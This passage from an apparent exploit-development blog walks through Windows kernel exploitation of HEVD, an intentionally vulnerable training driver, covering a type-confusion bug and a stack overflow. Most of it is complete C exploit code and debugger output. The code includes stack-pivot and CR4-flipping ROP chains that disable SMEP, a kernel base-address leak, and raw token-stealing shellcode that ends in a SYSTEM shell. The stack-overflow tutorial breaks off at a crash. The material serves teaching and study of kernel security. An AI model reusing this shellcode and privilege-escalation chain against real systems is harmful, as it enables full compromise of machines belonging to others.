    HANDLE hDriver = CreateFile(L"\\\\.\\HacksysExtremeVulnerableDriver", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (hDriver == INVALID_HANDLE_VALUE) {
        printf("[!] Error while creating a handle to the driver: %d\n", GetLastError());
        exit(1);
    }

    UserObject userObject = { 0 };
    userObject.ObjectID =   (ULONG_PTR)0x4141414141414141;
    userObject.ObjectType = (ULONG_PTR)0x4242424242424242;

    DeviceIoControl(hDriver, 0x222023, (LPVOID)&userObject, sizeof(userObject), NULL, 0, NULL, NULL);
    
    return 0;
}

We set a breakpoint and then run this first version of our exploit:

0: kd> ba e1 HEVD!TypeConfusionObjectInitializer
0: kd> g
1: kd> 
HEVD!TypeConfusionObjectInitializer+0x37:
fffff804`8669754b ff5308          call    qword ptr [rbx+8]
1: kd> dq rbx+8
ffffbf8c`e5b7b248  42424242`42424242 a53058d9`e6cdbefe

We can see that the driver is trying to call our provided “B”s, which of course fails. Now that we can trigger the vulnerability, the question is which address we want to call and how that helps us elevate privileges.

Since SMEP is active, we cannot just allocate shellcode and have the driver call it, so we have to make the call to a ROP-gadget that allows us to pivot the kernel stack to a location we control. This would allow us to place more ROP-gadgets there to ultimately disable SMEP & jump to our shellcode. Let’s try to find such a pivot gadget via ropper:

ropper --file ntoskrnl.exe --console --clear-cache
(ntoskrnl.exe/PE/x86_64)> search mov esp, 0x
...
0x0000000140317f70: mov esp, 0x48000000; add esp, 0x28; ret;
...

Note that we do not want just any value: it should be aligned, otherwise we risk getting a BSOD. The one we found looks pretty good. The add esp instruction does not bother us much, as we can just place some dummy values before our next gadgets. Now that we know the address our stack will be at after executing the gadget, we can allocate it and fill it with a few ROP-nops to make sure that our stack pivot is working as intended. Since ASLR is enabled, we also have to get the address the kernel is loaded at as discussed in the last post.
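
The effect of the pivot gadget can be worked out ahead of time. The following sketch models "mov esp, imm32; add esp, adj; ret" with plain integer arithmetic. The function names are made up for illustration, and the 8-byte alignment check reflects my assumption about what "aligned" needs to mean for QWORD-sized ROP slots.

```cpp
#include <cstdint>

// Model of "mov esp, imm32; add esp, adj; ret". The arithmetic is 32-bit and
// a write to ESP zero-extends into RSP, so the result is a low user-mode
// address that we are able to allocate ourselves.
std::uint64_t rsp_at_ret(std::uint32_t imm32, std::uint32_t adj) {
    std::uint32_t esp = imm32;
    esp += adj;
    return static_cast<std::uint64_t>(esp);
}

// True if value is a multiple of alignment (alignment must be a power of two).
bool is_aligned(std::uint64_t value, std::uint64_t alignment) {
    return (value & (alignment - 1)) == 0;
}
```

For the gadget above, rsp_at_ret(0x48000000, 0x28) gives 0x48000028, which is where the first ROP entry has to be placed. The 0x28 bytes in front of it are the dummy values.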

#include <stdio.h>
#include <Windows.h>
#include <winternl.h>
#include <Psapi.h>

#define QWORD ULONGLONG

QWORD getBaseAddr(LPCWSTR drvName) {
    LPVOID drivers[512];
    DWORD cbNeeded;
    int nDrivers, i = 0;
    if (EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded) && cbNeeded < sizeof(drivers)) {
        WCHAR szDrivers[512];
        nDrivers = cbNeeded / sizeof(drivers[0]);
        for (i = 0; i < nDrivers; i++) {
            if (GetDeviceDriverBaseName(drivers[i], szDrivers, sizeof(szDrivers) / sizeof(szDrivers[0]))) {
                if (wcscmp(szDrivers, drvName) == 0) {
                    return (QWORD)drivers[i];
                }
            }
        }
    }
    return 0;
}

typedef struct _UserObject {
    ULONG_PTR ObjectID;
    ULONG_PTR ObjectType;
} UserObject;

int main() {
    HANDLE hDriver = CreateFile(L"\\\\.\\HacksysExtremeVulnerableDriver", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (hDriver == INVALID_HANDLE_VALUE) {
        printf("[!] Error while creating a handle to the driver: %d\n", GetLastError());
        exit(1);
    }

    QWORD ntBase = getBaseAddr(L"ntoskrnl.exe");
    QWORD STACK_PIVOT_ADDR = 0x48000000;
    QWORD STACK_PIVOT_GADGET = ntBase + 0x317f70; // mov esp, 0x48000000; add esp, 0x28; ret; 
    QWORD NOP_GADGET = ntBase + 0x200042; // ret;
    int index = 0;

    LPVOID kernelStack = VirtualAlloc((LPVOID)STACK_PIVOT_ADDR, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    RtlFillMemory(kernelStack, 0x28, '\x41');
    QWORD* rop = (QWORD*)((QWORD)kernelStack + 0x28);
    
    *(rop + index++) = NOP_GADGET;
    *(rop + index++) = NOP_GADGET;
    *(rop + index++) = NOP_GADGET;

    UserObject userObject = { 0 };
    userObject.ObjectID =   (ULONG_PTR)0x4141414141414141;
    userObject.ObjectType = (ULONG_PTR)STACK_PIVOT_GADGET;

    printf("[>] Stack Pivot Gadget at %llx\n", STACK_PIVOT_GADGET);
    printf("[>] New Stack at %llx\n", STACK_PIVOT_ADDR);
    getchar();

    DeviceIoControl(hDriver, 0x222023, (LPVOID)&userObject, sizeof(userObject), NULL, 0, NULL, NULL);
    
    return 0;
}

We run the updated exploit with a breakpoint on the stack pivot:

0: kd> ba e1 fffff80581f17f70
0: kd> g
Breakpoint 0 hit
nt!ExfReleasePushLock+0x20:
fffff805`81f17f70 bc00000048      mov     esp,48000000h
...

UNEXPECTED_KERNEL_MODE_TRAP (7f)
...
kb will then show the corrected stack.
Arguments:
Arg1: 0000000000000008, EXCEPTION_DOUBLE_FAULT
Arg2: ffff910032865e70
Arg3: 0000000048000000

On executing the pivot gadget we get a crash. This issue can be tricky to debug. Essentially, two things are going wrong. First, we need a bit of space before and after our gadgets so the kernel can read and write there. Second, we have to make sure that the stack is actually paged in, because page faults will not be handled at this point (we are still in kernel mode). We update our PoC by adding 0x1000 bytes in front of our buffer and then use VirtualLock to force the memory to be paged in:

QWORD stackAddr = STACK_PIVOT_ADDR - 0x1000;
LPVOID kernelStack = VirtualAlloc((LPVOID)stackAddr, 0x14000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (!VirtualLock(kernelStack, 0x14000)) {
    printf("Error using VirtualLock: %d\n", GetLastError());
}
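
As a sanity check on the numbers in this snippet, the layout can be modelled without any Windows API. Region and pivot_region are hypothetical helpers. They only verify that the ROP slots and some headroom below the pivot fall inside the range that gets allocated and locked.

```cpp
#include <cstdint>

// Half-open address range [base, base + size).
struct Region {
    std::uint64_t base;
    std::uint64_t size;

    // True if [addr, addr + len) lies completely inside the region.
    bool contains(std::uint64_t addr, std::uint64_t len) const {
        return addr >= base && len <= size && addr - base <= size - len;
    }
};

// Range requested above: it starts `headroom` bytes below the pivot address
// and spans `total` bytes.
Region pivot_region(std::uint64_t pivot, std::uint64_t headroom, std::uint64_t total) {
    return Region{pivot - headroom, total};
}
```

With a pivot of 0x48000000, headroom of 0x1000 and a total of 0x14000, the region covers 0x47fff000 up to (but not including) 0x48013000. That leaves one page below the pivot and plenty of room above it.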

Now we no longer get a crash and can run our ROP-nops!

0: kd> ba e1 fffff8046bd17f70
0: kd> g
nt!ExfReleasePushLock+0x20:
fffff804`6bd17f70 bc00000048      mov     esp,48000000h
1: kd> dq 48000000 -100
00000000`47ffff00  00000000`00000000 00000000`00000000
...
1: kd> dq 48000000
00000000`48000000  41414141`41414141 41414141`41414141
...
1: kd> t
nt!ExfReleasePushLock+0x25:
fffff804`6bd17f75 83c428          add     esp,28h
1: kd> p
nt!ExfReleasePushLock+0x28:
fffff804`6bd17f78 c3              ret
1: kd> p
nt!CmpUnlockKcbStackFlusherLocksExclusive+0x3a:
fffff804`6bc00042 c3              ret

At this point, the hardest part is over. We can now execute ROP-gadgets which means we can repeat the exact same steps we used in our stack overflow exploit. First, we flip the 20th bit in CR4 to disable SMEP and then jump to our shellcode (which is the same as before). The full exploit:

#include <stdio.h>
#include <Windows.h>
#include <winternl.h>
#include <Psapi.h>

#define QWORD ULONGLONG

BYTE sc[256] = {
  0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, 0x48,
  0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc0, 0x4d,
  0x8b, 0x80, 0x48, 0x04, 0x00, 0x00, 0x49, 0x81, 0xe8, 0x48,
  0x04, 0x00, 0x00, 0x4d, 0x8b, 0x88, 0x40, 0x04, 0x00, 0x00,
  0x49, 0x83, 0xf9, 0x04, 0x75, 0xe5, 0x49, 0x8b, 0x88, 0xb8,
  0x04, 0x00, 0x00, 0x80, 0xe1, 0xf0, 0x48, 0x89, 0x88, 0xb8,
  0x04, 0x00, 0x00, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01,
  0x00, 0x00, 0x66, 0x8b, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x66,
  0xff, 0xc1, 0x66, 0x89, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x48,
  0x8b, 0x90, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8a, 0x68,
  0x01, 0x00, 0x00, 0x4c, 0x8b, 0x9a, 0x78, 0x01, 0x00, 0x00,
  0x48, 0x8b, 0xa2, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xaa,
  0x58, 0x01, 0x00, 0x00, 0x31, 0xc0, 0x0f, 0x01, 0xf8, 0x48,
  0x0f, 0x07, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff
};

QWORD getBaseAddr(LPCWSTR drvName) {
    LPVOID drivers[512];
    DWORD cbNeeded;
    int nDrivers, i = 0;
    if (EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded) && cbNeeded < sizeof(drivers)) {
        WCHAR szDrivers[512];
        nDrivers = cbNeeded / sizeof(drivers[0]);
        for (i = 0; i < nDrivers; i++) {
            if (GetDeviceDriverBaseName(drivers[i], szDrivers, sizeof(szDrivers) / sizeof(szDrivers[0]))) {
                if (wcscmp(szDrivers, drvName) == 0) {
                    return (QWORD)drivers[i];
                }
            }
        }
    }
    return 0;
}

typedef struct _UserObject {
    ULONG_PTR ObjectID;
    ULONG_PTR ObjectType;
} UserObject;

int main() {
    HANDLE hDriver = CreateFile(L"\\\\.\\HacksysExtremeVulnerableDriver", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (hDriver == INVALID_HANDLE_VALUE) {
        printf("[!] Error while creating a handle to the driver: %d\n", GetLastError());
        exit(1);
    }

    LPVOID shellcode = VirtualAlloc(NULL, 256, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    RtlCopyMemory(shellcode, sc, 256);

    QWORD ntBase = getBaseAddr(L"ntoskrnl.exe");
    QWORD STACK_PIVOT_ADDR = 0x48000000;
    QWORD STACK_PIVOT_GADGET = ntBase + 0x317f70; // mov esp, 0x48000000; add esp, 0x28; ret; 
    QWORD POP_RCX = ntBase + 0x20a386;
    QWORD MOV_CR4_RCX = ntBase + 0x3acd47;
    int index = 0;

    QWORD stackAddr = STACK_PIVOT_ADDR - 0x1000;
    LPVOID kernelStack = VirtualAlloc((LPVOID)stackAddr, 0x14000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (!VirtualLock(kernelStack, 0x14000)) {
        printf("Error using VirtualLock: %d\n", GetLastError());
    }

    RtlFillMemory((LPVOID)STACK_PIVOT_ADDR, 0x28, '\x41');
    QWORD* rop = (QWORD*)((QWORD)STACK_PIVOT_ADDR + 0x28);

    *(rop + index++) = POP_RCX;
    *(rop + index++) = 0x350ef8 ^ 1UL << 20;
    *(rop + index++) = MOV_CR4_RCX;
    *(rop + index++) = (QWORD)shellcode;

    UserObject userObject = { 0 };
    userObject.ObjectID =   (ULONG_PTR)0x4141414141414141;
    userObject.ObjectType = (ULONG_PTR)STACK_PIVOT_GADGET;

    printf("[>] Stack Pivot Gadget at %llx\n", STACK_PIVOT_GADGET);
    printf("[>] New Stack at %llx\n", kernelStack);
    getchar();

    DeviceIoControl(hDriver, 0x222023, (LPVOID)&userObject, sizeof(userObject), NULL, 0, NULL, NULL);
    
    printf("[>] Enjoy your shell!\n");
    system("cmd");
    return 0;
}

Running the exploit results in a SYSTEM shell on the target:

The post Windows Kernel Exploitation – HEVD x64 Type Confusion appeared first on Vulndev.

Windows Kernel Exploitation – HEVD x64 Stack Overflow

By: xct
2 July 2022 at 12:01

After setting up our debugging environment, we will look at HEVD for a few posts before diving into real-world scenarios. HEVD is an awesome, intentionally vulnerable driver by HackSysTeam that allows exploiting a lot of different kernel vulnerability types. I think this one is great to get started because you can play with exploitation without reversing any big applications or drivers.

The arguably easiest exploit on HEVD is a classic stack overflow where you overwrite the return address and have a good amount of space before & after the overwrite. We are using HEVD on default OS settings, which means ASLR, DEP & SMEP are enabled. The vulnerable function does not use stack cookies.

Overview

Target: HEVD
OS/Arch: Windows 11 x64
Protections: ASLR, DEP, SMEP

Vulnerability Discovery

I’m not going to pretend that I don’t know where the vulnerability is and will focus primarily on the exploitation part. The vulnerable function is TriggerBufferOverflowStack, which uses RtlCopyMemory to copy the user-provided buffer into a fixed-size buffer of size 512 on the kernel stack.

In assembly this ends up as memmove:

To see what’s actually happening, we are going to create our “exploit” and just call this function while having a breakpoint on it. We are going to create a new C++ console project with the following code:

#include <stdio.h>
#include <Windows.h>


int main()
{
	HANDLE hDriver = CreateFile(L"\\\\.\\HacksysExtremeVulnerableDriver", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
	if (hDriver == INVALID_HANDLE_VALUE)
	{
		printf("[!] Error while creating a handle to the driver: %d\n", GetLastError());
		exit(1);
	}

	LPVOID uBuffer = VirtualAlloc(NULL, 512, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	RtlFillMemory(uBuffer, 512, 'A');
	// Pass the buffer itself (not the address of the pointer) and its full length
	DeviceIoControl(hDriver, 0x222003, (LPVOID)uBuffer, 512, NULL, 0, NULL, NULL);

}

There are a few noteworthy things here. First of all, we are using CreateFile to get a handle to the driver, using its name \\.\HacksysExtremeVulnerableDriver . You can find this name by looking at the DriverEntry function in IDA:

Then we allocate our user buffer with a size of 512 which is the same size the kernel expects. Then we call the function via an IOCTL. This is essentially a way to tell the kernel to call a specific function in our driver, identified by the number, here 0x222003. Finding the number can be a bit tricky – in this case, we can go to TriggerBufferOverflowStack in IDA and then press x to find references. This shows a reference to BufferOverflowStackIoctlHandler for which we look for references again. Finally, we end up in IrpDeviceIoCtlHandler which is a big switch/case statement calling different functions depending on the IOCTL number you provide.

If we follow the arrow pointing to this basic block backward (can be a few times, but here it’s only once) we eventually end up at the correct number.
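
Once the number is known, it can also be taken apart. Windows packs I/O control codes with the CTL_CODE macro as (DeviceType << 16) | (Access << 14) | (Function << 2) | Method. The sketch below reverses that packing. IoctlFields and decode_ioctl are names chosen for this example and are not part of any SDK.

```cpp
#include <cstdint>

// Fields of a Windows I/O control code as packed by the CTL_CODE macro.
struct IoctlFields {
    std::uint32_t device_type;  // bits 16..31
    std::uint32_t access;       // bits 14..15
    std::uint32_t function;     // bits 2..13
    std::uint32_t method;       // bits 0..1
};

// Split a 32-bit IOCTL number into its four fields.
IoctlFields decode_ioctl(std::uint32_t code) {
    return IoctlFields{code >> 16, (code >> 14) & 0x3, (code >> 2) & 0xFFF, code & 0x3};
}
```

Decoding 0x222003 this way yields device type 0x22 (FILE_DEVICE_UNKNOWN), access 0, function 0x800 and method 3 (METHOD_NEITHER). With METHOD_NEITHER the driver receives the raw user-mode pointer, which matches the user-mode address we see in the debugger later on.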

To compile our exploit we set it to Release & x64. We know how to call the function now & are going to set a breakpoint in WinDbg. In order for WinDbg to automatically load the correct symbols for HEVD you should place HEVD.pdb at C:\projects\hevd\build\driver\vulnerable\x64\HEVD\HEVD.pdb .

0: kd> ba e1 HEVD!TriggerBufferOverflowStack
0: kd> g
... <run exploit> ...
Breakpoint 0 hit
HEVD!TriggerBufferOverflowStack:
fffff805`7d3e65b4 48895c2408      mov     qword ptr [rsp+8],rbx
u rip L40
...
fffff805`7d3e666d ff1595b9f7ff    call    qword ptr [HEVD!_imp_DbgPrintEx (fffff805`7d362008)]
fffff805`7d3e6673 4c8bc6          mov     r8,rsi
fffff805`7d3e6676 488bd7          mov     rdx,rdi
fffff805`7d3e6679 488d4c2420      lea     rcx,[rsp+20h]
fffff805`7d3e667e e83dabf7ff      call    HEVD!memcpy (fffff805`7d3611c0)
fffff805`7d3e6683 eb1b            jmp     HEVD!TriggerBufferOverflowStack+0xec (fffff805`7d3e66a0)
...

We can see that the memmove we saw in IDA is actually a memcpy. Let’s break there.

Breakpoint 1 hit
HEVD!TriggerBufferOverflowStack+0xca:
fffff805`7d3e667e e83dabf7ff      call    HEVD!memcpy (fffff805`7d3611c0)
1: kd> r
rax=0000000000000000 rbx=0000000000000000 rcx=ffffc88ab6420f60
rdx=0000022b3e180000 rsi=0000000000000200 rdi=0000022b3e180000
rip=fffff8057d3e667e rsp=ffffc88ab6420f40 rbp=ffffdb899c235c40
 r8=0000000000000200  r9=000000000000004d r10=0000000000000000
...

On Windows x64, the first four integer or pointer arguments to a function are passed in RCX, RDX, R8 & R9. Any additional arguments are placed on the stack. We can see that RCX is a kernel address and therefore likely the target kernel buffer. RDX is a user-mode address and contains our input buffer. R8 contains the length, here 512.

1: kd> dq rcx L4
ffffc88a`b6420f60  00000000`00000000 00000000`00000000
ffffc88a`b6420f70  00000000`00000000 00000000`00000000
1: kd> dq rdx L4
0000022b`3e180000  41414141`41414141 41414141`41414141
0000022b`3e180010  41414141`41414141 41414141`41414141

Let’s step over the call and observe that the kernel buffer is filled with our input.

1: kd> p
HEVD!TriggerBufferOverflowStack+0xcf:
fffff805`7d3e6683 eb1b            jmp     HEVD!TriggerBufferOverflowStack+0xec (fffff805`7d3e66a0)
1: kd> dq rcx L4
ffffc88a`b6420f60  41414141`41414141 41414141`41414141
ffffc88a`b6420f70  41414141`41414141 41414141`41414141

Now let’s see what happens when we extend the length of our input buffer:

...
LPVOID uBuffer = VirtualAlloc(NULL, 2500, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
RtlFillMemory(uBuffer, 2500, 'A');
DeviceIoControl(hDriver, 0x222003, (LPVOID)uBuffer, 2500, NULL, 0, NULL, NULL);
...

If we break again but this time run until the function returns, we can see that the return address has been overwritten:

Breakpoint 1 hit
HEVD!TriggerBufferOverflowStack+0xca:
fffff805`7d3e667e e83dabf7ff      call    HEVD!memcpy (fffff805`7d3611c0)
1: kd> p
HEVD!TriggerBufferOverflowStack+0xcf:
fffff805`7d3e6683 eb1b            jmp     HEVD!TriggerBufferOverflowStack+0xec (fffff805`7d3e66a0)
1: kd> pt
HEVD!TriggerBufferOverflowStack+0x10b:
fffff805`7d3e66bf c3              ret
1: kd> dq rsp
ffffc88a`b4a21778  41414141`41414141 41414141`41414141
ffffc88a`b4a21788  41414141`41414141 41414141`41414141
1: kd> g
Access violation - code c0000005 (!!! second chance !!!)
HEVD!TriggerBufferOverflowStack+0x10b:
fffff805`7d3e66bf c3              ret

We can see that the return address was overwritten with our input “A”s. At this point, we confirmed the vulnerability & can trigger a crash.

Exploitation

Now that we can crash it with a large input buffer, the next step is figuring out the exact offset at which we overwrite RIP. We can generate a pattern with msf, send it, and then inspect RSP on the ret:

msf-pattern_create -l 2500
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8...
...
LPVOID uBuffer = VirtualAlloc(NULL, 2500, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
const char* pattern = { "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8..."};
RtlCopyMemory(uBuffer, pattern, 2500);
DeviceIoControl(hDriver, 0x222003, (LPVOID)uBuffer, 2500, NULL, 0, NULL, NULL);
...
HEVD!TriggerBufferOverflowStack+0x10b:
fffff800`6ebf66bf c3              ret
1: kd> dq rsp
ffffba89`e9fe9778  43327243`31724330 35724334`72433372
ffffba89`e9fe9788  72433772`43367243 43307343`39724338
msf-pattern_offset -q 43327243 -l 2500
[*] Exact match at offset 2076

After sending the pattern and letting it run, we can see that we got our access violation again, and inspecting RSP allowed us to find the offset: 2076. Note that this offset is slightly off. We queried 43327243, which is the upper half of the little-endian QWORD at RSP, so the match lands 4 bytes past the start of the return address. If you debug it you will see that only the 2nd half of the shellcode address ends up at the correct position. In the following snippet, I account for that (real offset being 2076-4). At this point, we can allocate shellcode and try to jump to it.
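
The 4-byte difference can be reproduced offline. The sketch below regenerates a pattern in the same Aa0Aa1Aa2 style and looks up both halves of the QWORD seen at RSP. make_pattern and find_dword are my own helper names. They are meant to mirror what the msf tools do for this input, not to replace them.

```cpp
#include <cstddef>
#include <cstdint>
#include <string>

// Cyclic pattern built from (upper, lower, digit) triples: Aa0Aa1Aa2...
std::string make_pattern(std::size_t length) {
    std::string out;
    for (char u = 'A'; u <= 'Z' && out.size() < length; ++u)
        for (char l = 'a'; l <= 'z' && out.size() < length; ++l)
            for (char d = '0'; d <= '9' && out.size() < length; ++d) {
                out += u;
                out += l;
                out += d;
            }
    if (out.size() > length) out.resize(length);  // trim the last partial triple
    return out;
}

// Offset of a 32-bit value as it is laid out in memory (little-endian),
// or -1 if it does not occur in the pattern.
long find_dword(const std::string& pattern, std::uint32_t value) {
    char needle[4];
    for (int i = 0; i < 4; ++i)
        needle[i] = static_cast<char>((value >> (8 * i)) & 0xFF);
    std::size_t pos = pattern.find(needle, 0, 4);
    return pos == std::string::npos ? -1 : static_cast<long>(pos);
}
```

Looking up the upper half 0x43327243 gives 2076, while the lower half 0x31724330 (the bytes that actually come first in memory) gives 2072. The return address therefore starts at offset 2072.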

...
LPVOID uBuffer = VirtualAlloc(NULL, 2500, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
LPVOID shellcode = VirtualAlloc(NULL, 500, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
RtlFillMemory(uBuffer, 2500, '\x41');
RtlFillMemory(shellcode, 500, '\x90');
*(QWORD*)((QWORD)uBuffer + 2072) = (QWORD)shellcode;
...
0: kd> ba e1 HEVD!TriggerBufferOverflowStack+0x10b
0: kd> g
Breakpoint 0 hit
HEVD!TriggerBufferOverflowStack+0x10b:
fffff802`a74966bf c3              ret
1: kd> dq rsp
fffffa8a`25b72778  00000173`3c510000 41414141`41414141
fffffa8a`25b72788  41414141`41414141 41414141`41414141
1: kd> p
00000173`3c510000 90              nop
1: kd> p
KDTARGET: Refreshing KD connection

*** Fatal System Error: 0x000000fc

After trying to execute one of the NOPs we get an error. We can get some additional information with the analyze extension:

!analyze -v
...
ATTEMPTED_EXECUTE_OF_NOEXECUTE_MEMORY (fc)

This is SMEP (Supervisor Mode Execution Prevention) kicking in. The kernel is not allowed to execute code at the user-mode address we provided and therefore cannot just execute our shellcode. In order to bypass SMEP, we have to find a way to either disable it or make it “think” our page is not a user-mode page. For this introductory exploit, I’ll just show how to disable it.

SMEP is controlled by bit 20 of the CR4 register (counting from bit 0).

If we can somehow change that bit, we can disable it & still jump to our shellcode and execute it. While we can not execute shellcode, we can use ROP to flip that bit. To do that, we need to first look for gadgets we can use inside the driver or kernel. The kernel is a much better source of gadgets due to its size. I’m a big fan of ropper so I’m going to copy ntoskrnl.exe from the Debuggee VM to my Kali VM.

ropper --file ntoskrnl.exe --console
(ntoskrnl.exe/PE/x86_64)> search %cr4%
0x00000001403acd47: mov cr4, rcx; ret;
(ntoskrnl.exe/PE/x86_64)> search pop rcx
0x000000014020a386: pop rcx; ret;

We identified 2 gadgets we can use: POP RCX to load a value with bit 20 cleared into RCX, and MOV CR4, RCX to move that value into CR4. It’s usually a good idea to get the “old” value of CR4 and then modify it. For simplicity, we are just going to observe what it looks like in the debugger when we execute our exploit and then hardcode it here.

Before adding the ROP chain to our exploit we have to think about ASLR. Ropper shows relative addresses so we need to find the load address of the kernel. Fortunately, this is very easy from a medium integrity shell as there is an API that allows us to obtain it:

QWORD getBaseAddr(LPCWSTR drvName) {
	LPVOID drivers[512];
	DWORD cbNeeded;
	int nDrivers, i = 0;
	if (EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded) && cbNeeded < sizeof(drivers)) {
		WCHAR szDrivers[512];
		nDrivers = cbNeeded / sizeof(drivers[0]);
		for (i = 0; i < nDrivers; i++) {
			if (GetDeviceDriverBaseName(drivers[i], szDrivers, sizeof(szDrivers) / sizeof(szDrivers[0]))) {
				if (wcscmp(szDrivers, drvName) == 0) {
					return (QWORD)drivers[i];
				}
			}
		}
	}
	return 0;
}
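
The address arithmetic itself is small enough to sketch separately. I am assuming here that ropper printed its results relative to a preferred image base of 0x140000000, which is what the 0x00000001403acd47-style output suggests. kPreferredBase, gadget_offset and rebase are illustrative names.

```cpp
#include <cstdint>

// Assumption: ropper's addresses are relative to this preferred image base.
constexpr std::uint64_t kPreferredBase = 0x140000000ULL;

// Offset of a gadget from the start of the image.
constexpr std::uint64_t gadget_offset(std::uint64_t ropper_addr) {
    return ropper_addr - kPreferredBase;
}

// Runtime address of the gadget once the real load address is known.
constexpr std::uint64_t rebase(std::uint64_t ropper_addr, std::uint64_t runtime_base) {
    return runtime_base + gadget_offset(ropper_addr);
}
```

For example, gadget_offset(0x14020a386) is 0x20a386 for the pop rcx gadget and gadget_offset(0x1403acd47) is 0x3acd47 for mov cr4, rcx. These are the offsets that get added to the value returned by getBaseAddr.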

With the base address, we can now add the gadget offsets to obtain a proper ROP chain. We update our exploit with this chain & a dummy value for CR4:

#include <stdio.h>
#include <Windows.h>
#include <winternl.h>
#include <Psapi.h>

#define QWORD ULONGLONG

QWORD getBaseAddr(LPCWSTR drvName) {
	LPVOID drivers[512];
	DWORD cbNeeded;
	int nDrivers, i = 0;
	if (EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded) && cbNeeded < sizeof(drivers)) {
		WCHAR szDrivers[512];
		nDrivers = cbNeeded / sizeof(drivers[0]);
		for (i = 0; i < nDrivers; i++) {
			if (GetDeviceDriverBaseName(drivers[i], szDrivers, sizeof(szDrivers) / sizeof(szDrivers[0]))) {
				if (wcscmp(szDrivers, drvName) == 0) {
					return (QWORD)drivers[i];
				}
			}
		}
	}
	return 0;
}

int main()
{
	HANDLE hDriver = CreateFile(L"\\\\.\\HacksysExtremeVulnerableDriver", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
	if (hDriver == INVALID_HANDLE_VALUE)
	{
		printf("[!] Error while creating a handle to the driver: %d\n", GetLastError());
		exit(1);
	}

	QWORD ntBase = getBaseAddr(L"ntoskrnl.exe");
	printf("[>] NTBase: %llx\n", ntBase);
	QWORD POP_RCX = ntBase + 0x20a386;      // pop rcx; ret;
	QWORD MOV_CR4_RCX = ntBase + 0x3acd47;  // mov cr4, rcx; ret;
	int index = 0;

	LPVOID uBuffer = VirtualAlloc(NULL, 2500, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	LPVOID shellcode = VirtualAlloc(NULL, 500, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	RtlFillMemory(uBuffer, 2500, '\x41');
	RtlFillMemory(shellcode, 500, '\x90');

	QWORD* rop = (QWORD*)((QWORD)uBuffer + 2072);
	
	*(rop + index++) = POP_RCX;
	*(rop + index++) = 0x0;
	*(rop + index++) = MOV_CR4_RCX;
	*(rop + index++) = (QWORD)shellcode;

	DeviceIoControl(hDriver, 0x222003, (LPVOID)uBuffer, 2500, NULL, 0, NULL, NULL);

}

We run it with a breakpoint on the overwritten return address:

HEVD!TriggerBufferOverflowStack+0x10b:
fffff804`5e6f66bf c3              ret
0: kd> dq rsp
fffff088`b0910778  fffff804`3640a386 00000000`00000000
fffff088`b0910788  fffff804`365acd47 0000016d`86580000
fffff088`b0910798  41414141`41414141 41414141`41414141
fffff088`b09107a8  41414141`41414141 41414141`41414141
fffff088`b09107b8  41414141`41414141 41414141`41414141
fffff088`b09107c8  41414141`41414141 41414141`41414141
fffff088`b09107d8  41414141`41414141 41414141`41414141
fffff088`b09107e8  41414141`41414141 41414141`41414141
0: kd> p
nt!HalSendNMI+0x276:
fffff804`3640a386 59              pop     rcx
1: kd> p
nt!HalSendNMI+0x277:
fffff804`3640a387 c3              ret
1: kd> 
nt!KeFlushCurrentTbImmediately+0x17:
fffff804`365acd47 0f22e1          mov     cr4,rcx
1: kd> 
Unknown exception - code c0000096 (!!! second chance !!!)
nt!KeFlushCurrentTbImmediately+0x17:
fffff804`365acd47 0f22e1          mov     cr4,rcx

